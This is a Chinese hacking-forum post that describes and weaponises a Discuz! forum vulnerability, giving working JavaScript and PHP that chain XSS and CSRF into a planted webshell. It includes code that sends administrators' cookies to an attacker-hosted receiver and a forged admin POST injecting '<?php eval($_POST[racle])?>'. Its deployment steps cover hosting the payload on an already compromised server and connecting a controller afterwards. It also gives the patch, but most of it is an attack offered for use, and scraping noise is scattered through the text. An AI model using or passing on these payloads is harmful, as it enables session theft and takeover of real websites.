Discuz XSS得webshell
+ a5 d* ^6 S8 {! J/ LBy racle @tian6.com: A! W# H* C/ a; B! g. \
欢迎转帖.但请保留版权信息.
: Y# F) h; \9 W; f受影响版本iscuz<=6.1.0,gbk+utf+big5! `$ I8 M& ]6 }- A* V
1 X1 P, r- ~) N8 W. W$ ]新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.4 Y! ~( ~) [( V2 N& i) L) X
2 \5 K t8 Q, R4 W2 ~; v! B
' g9 v! k" [+ f4 Q; u3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
M7 L4 f, F3 O% {4 n当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
; t9 g0 R$ v5 z1 i9 k9 a& Q7 {' u4 n
1 z3 b4 \3 w, @3 \( Q3 o分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等.., a; {. w6 I; l; F1 j
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
! _% T7 q1 {2 v& R4 ^: C
- n% F: e# q6 U$ q0 m) Q) O& h/ j/ |0 h, e: ^% J5 ^
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------+ L5 {& t% b. g# J' j% R
% W$ r S$ U2 |) Q4 O# I
: y g" Z6 n- z8 B: k- _3 h" t- Sproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交./ |. i' F% M+ w$ P
7 E$ S! H- |# F% V& W$ `5 R. K) @problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.! R @$ x5 ^ W5 D
1 |8 R; m* J8 i! Zproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.+ a3 |2 j* j2 I! z. w
+ u1 X, W) f/ o( _; _$ X6 K
* ~8 v+ ?# p* w( d下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
+ J- m2 e$ U7 J
4 l. |: D0 X" ]' z2 Y% v global $runwizardfile, $runwizardhistory;0 U9 A R, N2 b8 G y* Q2 H
& p+ ~6 s4 G; ~4 l $fp = fopen($runwizardfile, 'w');
& [2 b% k, l, {' S/ E0 W
9 v/ p% F3 _( ~( f4 X' T fwrite($fp, serialize($runwizardhistory));
6 b' Q, e9 R, K8 y- B8 l' p- M
: E- h1 M; E# H& K( d fclose($fp);
* v6 |( L% U* l9 H8 g7 L0 c+ ^* ]" s8 s, Y. ~! r
}; c @" q7 w$ y2 i+ u, B7 w E
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.9 e7 b z* w. w$ O
以下是修补的办法:function saverunwizardhistory() {5 Q2 ?& Z1 q# s; R/ _
8 U$ `5 t- T; B1 D8 m& @
global $runwizardfile, $runwizardhistory;
, T% G t( _* Q( c- z- f% k8 I1 P! @3 d" N
$fp = fopen($runwizardfile, 'w');
0 V' e7 _& n. M; z% U& y" T" P5 ]! D; i
$s = '<?php exit;?>';" ?* H/ K' \' ?$ d1 |% \- |
+ o B0 U2 m* ~0 U. t
$s .= serialize($runwizardhistory);
: f3 ~& f( D7 I
& s4 @) G& ^* C, Z5 b% [ fwrite($fp, $s);& c; Y: e3 R3 p8 B0 k! K
G3 z# i- `5 m& x" X1 }- P6 _* \ fclose($fp);9 z$ r" y9 i- g* |- d
; u& r+ S; n+ |4 l}# {& L7 R( g& M6 a% c
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.& u4 Y2 \0 T2 B3 G" d
7 M/ c9 @) f/ r# |
6 u# q4 U. H1 P+ n
4 T8 y! F" t* @: f5 L----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
- j; }. r, p0 a/ V
! b: l6 U1 E r# w4 b$ m
7 j+ w) N, b3 z% P 以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.' q# _5 i; N/ v& W8 M# `( ?, x
4 J8 A; b, c: D( Q6 u我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.8 V) t" ~9 Q6 A1 |3 T! F2 f
( c+ X$ D8 J7 B9 }) @7 p
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.% D& t S1 `$ N+ K0 P3 T
# R. f; L: W& C: C4 C2 |8 p9 n
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
6 z; R1 B6 V. F1 F* d- o* ?- Y! J0 R. g
var url="http://目标网站/admincp.php"; 7 F9 i4 B( k5 D7 M8 n5 n$ ~
& n7 [ R% @8 {/*获得cookies*/+ c' Q% d: v' S
k0 T* \3 l) S6 [; g, k2 ^function getURL(s) {1 G$ A3 V& Q8 [2 G6 H
' R4 r5 [# ?. @ d2 ovar image = new Image();
U1 n+ { N+ K1 W
! W R* R# W( Timage.style.width = 0;8 k8 H* e6 }: r
( b. M# f H- k) _
image.style.height = 0;! ^- }$ _% k+ q; B$ T8 e
' O! K6 P6 p+ qimage.src = s;
, O+ M5 P9 Y! P( [% C' M4 k# F. t( N3 A: i- |
}
) E* f8 F1 W. F3 s! p
" E* U5 X; Z, c* g, e8 ggetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php
$ Z+ @, Q# d) v2 f, S复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];- [( B6 U" H5 \) k7 ~7 t4 q% ]
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 7 ` y4 K5 l5 v, a* i; n& m7 i# c
& v. k$ a" o+ B' D; T
A1 U& r6 q, E2 g" \( t3 B+ U获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
' j- @ t2 _1 W. @6 i4 l' y/ N8 W2 M5 R. ~' c
/ y/ Z5 h6 A3 x5 F; X5 X4 [5 }
b5 h3 v* G/ E7 ^9 H( r, F/*hash*/5 d. P1 J3 p# y
9 g' I9 J: _+ y8 p' }var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");4 k/ d0 j7 B* O( @! V* E; ~4 T$ j
7 G+ h" D* @% w$ u9 s$ zxmlHttpReq.open("GET", url+"admincp.php?action=home", false);
" @% H2 t6 P7 x" o& A
6 L. @4 T/ h! dxmlHttpReq.send();
/ Q7 Y) a" M1 u( r' e% |4 R) r I) N1 l
var resource = xmlHttpReq.responseText;
+ v) q" N6 k1 |( f7 j
" i/ f) z* t. J: c/ R3 {! j! {var numero = resource.search(/formhash/);
J0 F& ?- D" R/ c3 G" E( x+ B8 O0 t. x' ?1 }; x
var formhash=encodeURIComponent(resource.substr(numero+17,8));: O" U: H5 X6 t& n! M* c0 K
- v; y- E0 M3 a& ?# L2 q
# P+ X: H: o" B! p
6 A) U5 Z. A. k" u- I3 o
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
, f9 c" K4 J) H' G4 b6 D! A+ ?$ _. v! y- Y
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 ) b |) F! E" p" ]* @- y
( H, c4 U6 G7 y/ [9 axmlHttpReq.setRequestHeader("Referer", url);
. t9 h7 ~+ x9 F
0 e# }5 d$ e/ Q) Z& `9 exmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
; v2 K) Y8 n/ n7 ]( j
9 u! m- B$ ?8 R! b8 xxmlHttpReq.setrequestheader("content-length",post.length);
- Q4 V2 u# R1 r* C) p; e# k+ e8 G0 [9 F- ]
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); 7 U0 L ]7 A& M
% a# u% a m/ U, D" R! Z) O
xmlHttpReq.send(post);//发送数据0 W6 V- ~& W W/ R' L
复制代码这里HASH我假设正确,这样提交,也无须cookies* y8 d2 C: B1 h7 S
5 Q& A# p" l( F8 f3 d; f" B
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
0 e% ^$ v( H2 U, w5 L9 E: b1 S" |" {3 R- L! e- [' w3 ~) I
if (!$sock) die("$errstr ($errno)\n");3 p/ T P- b% T9 M
% n( |- r) q/ p/ j$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';& X' _ g, [2 T# n% g# ]# W) y1 ]
: i9 R: ^# D+ |" \8 F5 P! g8 G& B% P* A2 i9 ?4 D- w+ w
4 b) {( T. B! D) {+ Tfwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
; @* K) R0 z8 c3 T0 L
+ g: B+ b0 F0 \+ q* ofwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");5 I$ s1 Z: Y$ b. t& _1 h4 Y, Q
7 W. v; ]+ c4 O3 u5 c1 {, @fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");1 D" U; y' H% B2 _, _
* N6 _: m$ g% f( j$ ofwrite($sock, "Accept-Language: zh-cn\r\n");
1 U% H! x) [, ]# m% J9 i. A# \1 p2 Q5 D" g( U3 ? o3 w) U2 T o
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
; V' p; e$ w! k
8 g" q) g( U8 h7 d+ g T6 X' s5 Q Nfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
# T9 ^& n) l0 f9 b' D4 Z
3 {+ z- m* w3 ~5 }& Jfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");9 v+ x0 x+ \7 E
; M! @" l8 P6 q& L; C" {9 J" e5 qfwrite($sock, "Host: $url\r\n");
6 g! R/ [+ u# N( h
0 t5 F0 d8 }; C4 b M* Mfwrite($sock, "Content-Length: ".strlen($data)."\r\n");
9 F% H- C4 F/ V: x8 W
% y" v M/ U; G& v6 ?- y8 kfwrite($sock, "Connection: Keep-Alive\r\n");
0 A0 f5 x% c% w6 q; d0 v* o0 l% r- c4 @) Y
fwrite($sock, "Cache-Control: no-cache\r\n");% S2 C) I! C$ ^9 @
5 Z W# z1 i' a: X7 x1 {- S
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
' A: w( \$ l0 \2 a# s0 ~4 S9 Q2 H$ y$ n. L; c V( e
fwrite($sock, $data);
4 n/ W2 H) U3 n7 @7 r) w, _
* z" c3 b( a) d9 |5 N
/ K( J- r, v: R: R+ [2 H- S& g! I
$headers = "";
: l# V3 Q* ~+ Q3 Y( j
2 ]; a" G( e: E7 f$ Gwhile ($str = trim(fgets($sock, 4096)))* {! x2 \ I$ i0 S ^' C) p$ r
0 s2 g5 r) }% ~: v. x( C( N. { $headers .= "$str\n";
7 [% y' p/ e0 A2 a# N: H
$ l% I; n" ?, ]7 x9 {1 t" yecho "\n";+ S$ G8 S5 a& V6 G6 L7 Z
( U$ P `8 [' C H l
$body = "";8 c+ N: O8 f& f. s
8 X2 _9 d) C& D3 x2 ~
while (!feof($sock))( `3 |! |- b8 g" i+ t5 t
7 O, \! ]+ _9 _) |5 C0 v( J2 D
$body .= fgets($sock, 4096);( h+ V9 Y+ B, n% K0 d* w
+ V/ X9 y8 H5 L) S) K$ @( a
fclose($sock);
" \5 _. t2 p! J9 R, v: }8 q/ B4 F8 G9 D, v- @# `
echo $body;9 N7 r8 E" W' s. V- M; D: R
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
6 f2 J" [4 H& m. ~5 E) Q# o9 @2 \) Y' }9 _
7 b b4 L" C+ p-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------5 B! q# H. O! x3 u4 B3 z3 K
5 g) ~ h$ [3 }/ ?
7 o. i9 p8 Z( `* X! d/ }2 J
1HP SOCKET利用方法首先打开racle.js
6 O- B) W7 K# v( t1 J
/ x- R% _: J; ?* i: L( wvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home6 i7 V( T: B4 F* M. `3 r
) Y# V# a0 w9 _% v* F8 L# O
* D* R4 E. w4 d
/ o7 L7 ~# e* X9 v* c3 s
然后打开[email protected]$ f$ P$ o2 b: @7 k! E9 `. r
4 _2 K% c5 ~) i# f8 V1 I$ r6 _$url="[email protected]"; //改成你要XSS攻击的目标,譬如www.discuz.com
2 N0 l- @2 r! N/ A" z U% N& \; i( O0 Y/ I9 |% s* \
5 g8 n/ m! E5 f; |( V
: x8 P. n9 d/ D如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
8 N+ i1 e# M2 {9 [* ^
- \8 \: d& V q" I* _; k4 A& ^# t6 TgetURL("[email protected]?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
5 n6 e' W/ y9 A8 `0 b4 y8 F5 L/ m& k' X4 K. }
为
' _) ^* y2 Q0 K
) [. U5 j# G0 x- C% lgetURL("[email protected]?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
; a. Q; v# H7 ^; J( z& ?6 W, j复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址./ `$ S* G- R/ i& u: y% {9 O
5 x2 _) Z1 M0 |
! O9 E Q( C& \! I+ g/ k
6 {/ S* D& u! d" A如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
$ l# s0 i& L0 ~8 M4 p6 u* ~ D. c% J8 w2 U9 b
var formhash=encodeURIComponent(resource.substr(numero+17,8));- _; `9 l7 \" m: s7 y' E
! k1 V: v8 z% Z2 K% o4 t3 d为
. V8 V( a- A0 L7 l% M
( j; Q4 S" W' e! d5 x) c) Avar formhash=encodeURIComponent(resource.substr(numero+9,8));6 t2 X' ]# u& _) U; O* n
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.' A$ n1 F2 M1 Q' L: j5 K
& v& e6 W- C" s: o+ ]. u; y
如果是第一种方法,就把racle.js,还有[email protected]文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.6 t' J3 c3 ^! u
9 P1 e; B: A) w" Q$ P$ H
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.+ @& a% w% X* t v* K+ Y i
" W6 b. I* G, F, ^
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.* O" Y W5 c R7 f0 m; `! Q5 i' B' x
+ e d( C1 I& M |